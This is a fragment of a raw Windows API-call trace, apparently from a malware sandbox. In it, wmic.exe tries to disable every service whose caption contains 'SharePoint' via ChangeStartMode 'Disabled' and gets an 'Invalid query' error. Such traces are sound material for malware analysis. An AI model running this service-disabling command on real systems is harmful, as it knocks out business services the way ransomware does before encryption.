pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0121.605] CoCreateInstance (in: rclsid=0x1306a3c*(Data1=0xeac8a024, Data2=0x21e2, Data3=0x4523, Data4=([0]=0xad, [1]=0x73, [2]=0xa7, [3]=0x1a, [4]=0xa, [5]=0xa2, [6]=0xf5, [7]=0x6a)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a4c*(Data1=0x81166f58, Data2=0xdd98, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x20, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0x88b9f0 | out: ppv=0x88b9f0*=0x976220) returned 0x0 [0121.715] WbemQuery:IWbemQuery:Parse (This=0x976220, pszLang="WQL", pszQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled", uFlags=0x0) returned 0x80041021 [0121.715] WbemQuery:IUnknown:Release (This=0x976220) returned 0x0 [0121.715] IEnumWbemClassObject:Next (in: This=0x986aa0, lTimeout=-1, uCount=0x1, apObjects=0x88b9e0, puReturned=0x88b9c4 | out: apObjects=0x88b9e0*=0x0, puReturned=0x88b9c4*=0x0) returned 0x80041017 [0121.741] _CxxThrowException () [0121.741] IUnknown:Release (This=0x986aa0) returned 0x0 [0121.741] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.742] LoadStringW (in: hInstance=0x0, uID=0xb7f5, lpBuffer=0x88f2ec, cchBufferMax=1024 | out: lpBuffer="Node - %1\r\n") returned 0xb [0121.742] FormatMessageW (in: dwFlags=0x2500, lpSource=0x88f2ec, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x88f2d4, nSize=0x0, Arguments=0x88f2d8 | out: lpBuffer="퓈\x96㮈´\x88瞰嗬턌") returned 0x10 [0121.742] LocalFree (hMem=0x96d4c8) returned 0x0 [0121.742] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Node - LHNIWSJ\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.742] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Node - LHNIWSJ\r\n", cchWideChar=-1, lpMultiByteStr=0xb42238, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Node - LHNIWSJ\r\n", lpUsedDefaultChar=0x0) returned 17 [0121.742] __iob_func () returned 0x77ac1208 [0121.742] fprintf (in: _File=0x77ac1248, _Format="%s" | out: _File=0x77ac1248) returned 16 [0121.742] __iob_func () returned 0x77ac1208 [0121.742] fflush (in: _File=0x77ac1248 | out: _File=0x77ac1248) returned 0 [0121.742] ??0CHString@@QAE@XZ () returned 0x88fa90 [0121.742] ?Format@CHString@@QAAXPBGZZ () returned 0xb4afec [0121.743] SysStringLen (param_1="") returned 0x7 [0121.743] SysStringLen (param_1="0x80041017") returned 0x1d [0121.743] CoCreateInstance (in: rclsid=0x13069bc*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x13069cc*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x134957c | out: ppv=0x134957c*=0x9635f0) returned 0x0 [0121.743] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x9635f0, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x88fa94 | out: MessageText=0x88fa94*="Invalid query\r\n") returned 0x0 [0121.917] SysStringLen (param_1="0x80041017") returned 0x24 [0121.917] SysStringLen (param_1="") returned 0xd [0121.917] SysStringLen (param_1="0x80041017") returned 0x31 [0121.917] SysStringLen (param_1="Invalid query\r\n") returned 0xf [0121.917] SysStringLen (param_1="0x80041017Invalid query\r\n") returned 0x40 [0121.917] SysStringLen (param_1="") returned 0xe [0121.918] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x9635f0, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x88fa98 | out: MessageText=0x88fa98*="WMI") returned 0x0 [0121.918] SysStringLen (param_1="0x80041017Invalid query\r\n") returned 0x4e [0121.918] SysStringLen (param_1="") returned 0xe [0121.918] SysStringLen (param_1="0x80041017Invalid query\r\n") returned 0x5c [0121.918] SysStringLen (param_1="WMI") returned 0x3 [0121.918] SysStringLen (param_1="0x80041017Invalid query\r\nWMI") returned 0x5f [0121.918] SysStringLen (param_1="") returned 0xf [0121.918] lstrlenW (lpString="WMI") returned 3 [0121.918] lstrlenW (lpString="Wbem") returned 4 [0121.918] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0121.918] lstrlenW (lpString="WMI") returned 3 [0121.918] lstrlenW (lpString="WMI") returned 3 [0121.918] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0121.918] WbemStatusCodeText:IUnknown:Release (This=0x9635f0) returned 0x0 [0121.918] ??1CHString@@QAE@XZ () returned 0x1 [0121.918] SysStringLen (param_1="0x80041017Invalid query\r\nWMI") returned 0x6e [0121.918] SysStringLen (param_1="") returned 0x8 [0121.919] ??0CHString@@QAE@XZ () returned 0x88fa0c [0121.919] SysStringLen (param_1="") returned 0x0 [0121.919] CoCreateInstance (in: rclsid=0x13069bc*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x13069cc*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x134957c | out: ppv=0x134957c*=0x963560) returned 0x0 [0121.919] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x963560, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x88fa10 | out: MessageText=0x88fa10*="Invalid query\r\n") returned 0x0 [0121.919] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x963560, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x88fa14 | out: MessageText=0x88fa14*="WMI") returned 0x0 [0121.919] lstrlenW (lpString="WMI") returned 3 [0121.919] lstrlenW (lpString="Wbem") returned 4 [0121.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0121.919] lstrlenW (lpString="WMI") returned 3 [0121.919] lstrlenW (lpString="WMI") returned 3 [0121.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0121.919] WbemStatusCodeText:IUnknown:Release (This=0x963560) returned 0x0 [0121.919] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.919] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x88f26c, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0121.919] FormatMessageW (in: dwFlags=0x2500, lpSource=0x88f26c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x88f254, nSize=0x0, Arguments=0x88f258 | out: lpBuffer="\x96䋤\x96l") returned 0x25 [0121.919] LocalFree (hMem=0x96f620) returned 0x0 [0121.919] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Invalid query\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0121.919] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Invalid query\r\n", cchWideChar=-1, lpMultiByteStr=0xb4afe0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Invalid query\r\n", lpUsedDefaultChar=0x0) returned 38 [0121.919] __iob_func () returned 0x77ac1208 [0121.919] fprintf (in: _File=0x77ac1248, _Format="%s" | out: _File=0x77ac1248) returned 37 [0121.921] __iob_func () returned 0x77ac1208 [0121.921] fflush (in: _File=0x77ac1248 | out: _File=0x77ac1248) returned 0 [0121.921] SysStringLen (param_1="") returned 0x18 [0121.921] SysStringLen (param_1="0x80041017Invalid query\r\nWMI") returned 0x76 [0121.922] ??0CHString@@QAE@PBG@Z () returned 0x88fae8 [0121.922] ??YCHString@@QAEABV0@PBG@Z () returned 0x88fae8 [0121.922] GetCurrentThreadId () returned 0xca0 [0121.922] ??1CHString@@QAE@XZ () returned 0x1 [0121.922] SysStringLen (param_1="0x80041017Invalid query\r\nWMI") returned 0x8e [0121.922] SysStringLen (param_1="") returned 0xa [0121.922] ??0CHString@@QAE@XZ () returned 0x88fae0 [0121.922] memcpy_s (in: _Destination=0x88fa94, _DestinationSize=0xe, _Source=0x966864, _SourceSize=0xe | out: _Destination=0x88fa94) returned 0x0 [0121.922] lstrlenW (lpString="&") returned 1 [0121.922] lstrlenW (lpString="&") returned 5 [0121.922] lstrlenW (lpString="<") returned 1 [0121.922] lstrlenW (lpString="<") returned 4 [0121.922] lstrlenW (lpString=">") returned 1 [0121.922] lstrlenW (lpString=">") returned 4 [0121.922] lstrlenW (lpString="'") returned 1 [0121.922] lstrlenW (lpString="'") returned 6 [0121.922] lstrlenW (lpString="\"") returned 1 [0121.922] lstrlenW (lpString=""") returned 6 [0121.922] ?Format@CHString@@QAAXPBGZZ () returned 0xb4afec [0121.922] ??1CHString@@QAE@XZ () returned 0x1 [0121.922] ??0CHString@@QAE@XZ () returned 0x88fadc [0121.922] lstrlenW (lpString="&") returned 1 [0121.922] lstrlenW (lpString="&") returned 5 [0121.922] lstrlenW (lpString="<") returned 1 [0121.922] lstrlenW (lpString="<") returned 4 [0121.922] lstrlenW (lpString=">") returned 1 [0121.922] lstrlenW (lpString=">") returned 4 [0121.922] lstrlenW (lpString="'") returned 1 [0121.922] lstrlenW (lpString="'") returned 6 [0121.922] lstrlenW (lpString="\"") returned 1 [0121.922] lstrlenW (lpString=""") returned 6 [0121.923] ?Format@CHString@@QAAXPBGZZ () returned 0xb4afec [0121.923] SysStringLen (param_1="") returned 0x9 [0121.923] SysStringLen (param_1=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 0x80 [0121.923] ??0CHString@@QAE@XZ () returned 0x88faa0 [0121.923] ??0CHString@@QAE@XZ () returned 0x88fa54 [0121.923] memcpy_s (in: _Destination=0x88f9f0, _DestinationSize=0xe, _Source=0x9668dc, _SourceSize=0xe | out: _Destination=0x88f9f0) returned 0x0 [0121.923] lstrlenW (lpString="&") returned 1 [0121.923] lstrlenW (lpString="&") returned 5 [0121.923] lstrlenW (lpString="<") returned 1 [0121.923] lstrlenW (lpString="<") returned 4 [0121.923] lstrlenW (lpString=">") returned 1 [0121.923] lstrlenW (lpString=">") returned 4 [0121.923] lstrlenW (lpString="'") returned 1 [0121.923] lstrlenW (lpString="'") returned 6 [0121.923] lstrlenW (lpString="\"") returned 1 [0121.923] lstrlenW (lpString=""") returned 6 [0121.923] ?Format@CHString@@QAAXPBGZZ () returned 0xb4b404 [0121.923] SysStringLen (param_1="") returned 0xa [0121.923] SysStringLen (param_1="LHNIWSJ") returned 0x14 [0121.923] SysStringLen (param_1="LHNIWSJ") returned 0x1e [0121.923] SysStringLen (param_1="") returned 0xb [0121.924] ??1CHString@@QAE@XZ () returned 0x1 [0121.924] SysStringLen (param_1="") returned 0x17 [0121.924] SysStringLen (param_1="LHNIWSJ") returned 0x29 [0121.924] lstrlenW (lpString="LIST") returned 4 [0121.924] lstrlenW (lpString="GET") returned 3 [0121.924] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1 [0121.924] SysStringLen (param_1="LHNIWSJ") returned 0x40 [0121.924] SysStringLen (param_1="") returned 0x18 [0121.924] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.924] SysStringLen (param_1=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 0x89 [0121.924] SysStringLen (param_1="LHNIWSJ") returned 0x58 [0121.924] ??0CHString@@QAE@XZ () returned 0x88fa88 [0121.924] memcpy_s (in: _Destination=0x88fa04, _DestinationSize=0xe, _Source=0x966c24, _SourceSize=0xc | out: _Destination=0x88fa04) returned 0x0 [0121.924] lstrlenW (lpString="&") returned 1 [0121.924] lstrlenW (lpString="&") returned 5 [0121.924] lstrlenW (lpString="<") returned 1 [0121.924] lstrlenW (lpString="<") returned 4 [0121.924] lstrlenW (lpString=">") returned 1 [0121.924] lstrlenW (lpString=">") returned 4 [0121.924] lstrlenW (lpString="'") returned 1 [0121.924] lstrlenW (lpString="'") returned 6 [0121.924] lstrlenW (lpString="\"") returned 1 [0121.924] lstrlenW (lpString=""") returned 6 [0121.925] memcpy_s (in: _Destination=0x88fa04, _DestinationSize=0xe, _Source=0x966c24, _SourceSize=0xc | out: _Destination=0x88fa04) returned 0x0 [0121.925] lstrlenW (lpString="&") returned 1 [0121.925] lstrlenW (lpString="&") returned 5 [0121.925] lstrlenW (lpString="<") returned 1 [0121.925] lstrlenW (lpString="<") returned 4 [0121.925] lstrlenW (lpString=">") returned 1 [0121.925] lstrlenW (lpString=">") returned 4 [0121.925] lstrlenW (lpString="'") returned 1 [0121.925] lstrlenW (lpString="'") returned 6 [0121.925] lstrlenW (lpString="\"") returned 1 [0121.925] lstrlenW (lpString=""") returned 6 [0121.925] memcpy_s (in: _Destination=0x88fa04, _DestinationSize=0xe, _Source=0x966c24, _SourceSize=0x6 | out: _Destination=0x88fa04) returned 0x0 [0121.925] lstrlenW (lpString="&") returned 1 [0121.925] lstrlenW (lpString="&") returned 5 [0121.925] lstrlenW (lpString="<") returned 1 [0121.925] lstrlenW (lpString="<") returned 4 [0121.925] lstrlenW (lpString=">") returned 1 [0121.925] lstrlenW (lpString=">") returned 4 [0121.925] lstrlenW (lpString="'") returned 1 [0121.925] lstrlenW (lpString="'") returned 6 [0121.925] lstrlenW (lpString="\"") returned 1 [0121.925] lstrlenW (lpString=""") returned 6 [0121.925] memcpy_s (in: _Destination=0x88fa04, _DestinationSize=0xe, _Source=0x966c24, _SourceSize=0x6 | out: _Destination=0x88fa04) returned 0x0 [0121.925] lstrlenW (lpString="&") returned 1 [0121.925] lstrlenW (lpString="&") returned 5 [0121.925] lstrlenW (lpString="<") returned 1 [0121.925] lstrlenW (lpString="<") returned 4 [0121.925] lstrlenW (lpString=">") returned 1 [0121.925] lstrlenW (lpString=">") returned 4 [0121.925] lstrlenW (lpString="'") returned 1 [0121.925] lstrlenW (lpString="'") returned 6 [0121.925] lstrlenW (lpString="\"") returned 1 [0121.925] lstrlenW (lpString=""") returned 6 [0121.925] lstrlenW (lpString="&") returned 1 [0121.925] lstrlenW (lpString="&") returned 5 [0121.925] lstrlenW (lpString="<") returned 1 [0121.925] lstrlenW (lpString="<") returned 4 [0121.925] lstrlenW (lpString=">") returned 1 [0121.926] lstrlenW (lpString=">") returned 4 [0121.926] lstrlenW (lpString="'") returned 1 [0121.926] lstrlenW (lpString="'") returned 6 [0121.926] lstrlenW (lpString="\"") returned 1 [0121.926] lstrlenW (lpString=""") returned 6 [0121.926] lstrlenW (lpString="&") returned 1 [0121.926] lstrlenW (lpString="&") returned 5 [0121.926] lstrlenW (lpString="<") returned 1 [0121.926] lstrlenW (lpString="<") returned 4 [0121.926] lstrlenW (lpString=">") returned 1 [0121.926] lstrlenW (lpString=">") returned 4 [0121.926] lstrlenW (lpString="'") returned 1 [0121.926] lstrlenW (lpString="'") returned 6 [0121.926] lstrlenW (lpString="\"") returned 1 [0121.926] lstrlenW (lpString=""") returned 6 [0121.926] memcpy_s (in: _Destination=0x88fa04, _DestinationSize=0xe, _Source=0x966c24, _SourceSize=0xc | out: _Destination=0x88fa04) returned 0x0 [0121.926] lstrlenW (lpString="&") returned 1 [0121.926] lstrlenW (lpString="&") returned 5 [0121.926] lstrlenW (lpString="<") returned 1 [0121.926] lstrlenW (lpString="<") returned 4 [0121.926] lstrlenW (lpString=">") returned 1 [0121.926] lstrlenW (lpString=">") returned 4 [0121.926] lstrlenW (lpString="'") returned 1 [0121.926] lstrlenW (lpString="'") returned 6 [0121.926] lstrlenW (lpString="\"") returned 1 [0121.926] lstrlenW (lpString=""") returned 6 [0121.926] ?Format@CHString@@QAAXPBGZZ () returned 0x6fb0054 [0121.927] ??1CHString@@QAE@XZ () returned 0x1 [0121.928] SysStringLen (param_1=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'LHNIWSJ") returned 0xe1 [0121.928] SysStringLen (param_1="root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x173 [0121.928] SysStringLen (param_1=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'LHNIWSJroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x254 [0121.928] SysStringLen (param_1="") returned 0xa [0121.928] ??1CHString@@QAE@XZ () returned 0x1 [0121.928] SysStringLen (param_1="") returned 0x0 [0121.928] SysStringLen (param_1="") returned 0x5d [0121.928] SysStringLen (param_1="") returned 0x5d [0121.928] SysStringLen (param_1=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'LHNIWSJroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x25e [0121.928] IUnknown:Release (This=0x960900) returned 0x0 [0121.930] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0121.930] SysStringLen (param_1="") returned 0x0 [0121.930] SysStringLen (param_1="0x80041017Invalid query\r\nWMI") returned 0x98 [0121.930] _kbhit () returned 0x0 [0121.939] SysStringLen (param_1=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'LHNIWSJroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x2bb [0121.939] SysStringLen (param_1="0x80041017Invalid query\r\nWMI") returned 0x98 [0121.939] SysStringLen (param_1=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'LHNIWSJroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041017Invalid query\r\nWMI") returned 0x353 [0121.939] SysStringLen (param_1="") returned 0xa [0121.939] ApiSetQueryApiSetPresence () returned 0x0 [0121.939] GetCurrentThreadId () returned 0xca0 [0121.939] ??0CHString@@QAE@PBG@Z () returned 0x88fae0 [0121.939] ??YCHString@@QAEABV0@PBG@Z () returned 0x88fae0 [0121.939] lstrlenW (lpString="LIST") returned 4 [0121.939] lstrlenW (lpString="GET") returned 3 [0121.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1 [0121.939] lstrlenW (lpString="ASSOC") returned 5 [0121.939] lstrlenW (lpString="GET") returned 3 [0121.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3 [0121.939] lstrlenW (lpString="GET") returned 3 [0121.939] lstrlenW (lpString="GET") returned 3 [0121.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="GET", cchCount2=3) returned 2 [0121.940] GetSystemDirectoryW (in: lpBuffer=0xb4b0c8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0121.940] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0121.940] SysStringLen (param_1="\\wbem\\") returned 0x6 [0121.940] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] lstrlenW (lpString="CSV") returned 3 [0121.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] lstrlenW (lpString="HFORM") returned 5 [0121.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 1 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] lstrlenW (lpString="HTABLE") returned 6 [0121.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] lstrlenW (lpString="LIST") returned 4 [0121.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="TABLE", cchCount2=5) returned 1 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] lstrlenW (lpString="MOF") returned 3 [0121.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] lstrlenW (lpString="RAWXML") returned 6 [0121.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] lstrlenW (lpString="TABLE") returned 5 [0121.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 2 [0121.940] SysStringLen (param_1="texttable.xsl") returned 0xd [0121.940] SysStringLen (param_1="hform.xsl") returned 0x9 [0121.940] SysStringLen (param_1="texttable.xsl") returned 0xd [0121.940] SysStringLen (param_1="htable.xsl") returned 0xa [0121.940] SysStringLen (param_1="texttable.xsl") returned 0xd [0121.940] SysStringLen (param_1="csv.xsl") returned 0x7 [0121.940] SysStringLen (param_1="texttable.xsl") returned 0xd [0121.941] SysStringLen (param_1="mof.xsl") returned 0x7 [0121.941] SysStringLen (param_1="texttable.xsl") returned 0xd [0121.941] SysStringLen (param_1="xml.xsl") returned 0x7 [0121.941] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0121.941] SysStringLen (param_1="\\") returned 0x1 [0121.941] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\\\") returned 0x1a [0121.941] SysStringLen (param_1="texttable.xsl") returned 0xd [0121.941] CreateFileW (lpFileName="C:\\Windows\\system32\\wbem\\\\texttable.xsl" (normalized: "c:\\windows\\system32\\wbem\\texttable.xsl"), dwDesiredAccess=0x0, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x278 [0121.955] CloseHandle (hObject=0x278) returned 1 [0121.955] ??0CHString@@QAE@PBG@Z () returned 0x88f9f8 [0121.955] ?Right@CHString@@QBE?AV1@H@Z () returned 0x88f9fc [0121.955] ??0CHString@@QAE@PBG@Z () returned 0x88fa00 [0121.955] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0 [0121.955] ??1CHString@@QAE@XZ () returned 0x1 [0121.955] ??1CHString@@QAE@XZ () returned 0x1 [0121.955] ??1CHString@@QAE@XZ () returned 0x1 [0121.955] GetCurrentThreadId () returned 0xca0 [0121.955] ??0CHString@@QAE@XZ () returned 0x88fa4c [0121.955] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1349574 | out: ppv=0x1349574*=0x1024c18) returned 0x0 [0121.956] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x1024c18, bstrXML=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'LHNIWSJroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041017Invalid query\r\nWMI", isSuccessful=0x88fa58 | out: isSuccessful=0x88fa58*=0xffff) returned 0x0 [0122.016] ??0CHString@@QAE@XZ () returned 0x88f9ec [0122.016] GetCurrentThreadId () returned 0xca0 [0122.016] CoCreateInstance (in: rclsid=0x1306a5c*(Data1=0x2933bf94, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x1306a6c*(Data1=0x2933bf93, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x88f9d4 | out: ppv=0x88f9d4*=0x1026328) returned 0x0 [0122.016] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x88f9cc | out: ppv=0x88f9cc*=0x10267b8) returned 0x0 [0122.017] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x10267b8, async=0) returned 0x0 [0122.017] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\\\texttable.xsl") returned 0x4e [0122.017] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x10267b8, xmlSource=0x88f8f4*(varType=0x8, wReserved1=0x5ee, wReserved2=0xf928, wReserved3=0x88, varVal1="C:\\Windows\\system32\\wbem\\\\texttable.xsl", varVal2=0x1024ca4), isSuccessful=0x88f9e4 | out: isSuccessful=0x88f9e4*=0xffff) returned 0x0 [0122.196] XSLTemplate:IXSLTemplate:putref_stylesheet (This=0x1026328, stylesheet=0x10267b8) returned 0x0 [0122.706] __dllonexit () returned 0x7407cc00 [0122.706] __dllonexit () returned 0x7407cc10 [0122.706] __dllonexit () returned 0x7407cc20 [0122.707] GetUserDefaultLCID () returned 0x409 [0122.707] GetVersion () returned 0x2800000a [0122.707] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x77670000 [0122.708] GetProcAddress (hModule=0x77670000, lpProcName="QueryProtectedPolicy") returned 0x76a39ec0 [0122.708] VirtualProtect (in: lpAddress=0x740ae32c, dwSize=0x4, flNewProtect=0x4, lpflOldProtect=0x88df70 | out: lpflOldProtect=0x88df70*=0x2) returned 1 [0122.708] VirtualProtect (in: lpAddress=0x740ae32c, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x88df70 | out: lpflOldProtect=0x88df70*=0x4) returned 1 [0122.716] GetUserDefaultLCID () returned 0x409 [0122.716] GetACP () returned 0x4e4 [0122.716] LoadLibraryExA (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x0) returned 0x74030000 [0122.778] GetProcAddress (hModule=0x74030000, lpProcName="AmsiInitialize") returned 0x74033d40 [0122.778] GetProcAddress (hModule=0x74030000, lpProcName="AmsiScanString") returned 0x740340e0 [0122.778] AmsiInitialize () returned 0x0 [0122.926] GetCurrentThreadId () returned 0xca0 [0122.926] GetCurrentThreadId () returned 0xca0 [0122.926] GetCurrentThreadId () returned 0xca0 [0122.926] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0122.926] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x88f5fc, cchData=6 | out: lpLCData="1252") returned 5 [0122.927] IsValidCodePage (CodePage=0x4e4) returned 1 [0122.927] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x76970000 [0122.927] GetProcAddress (hModule=0x76970000, lpProcName="ResolveDelayLoadedAPI") returned 0x76a24e60 [0122.927] GetProcAddress (hModule=0x76970000, 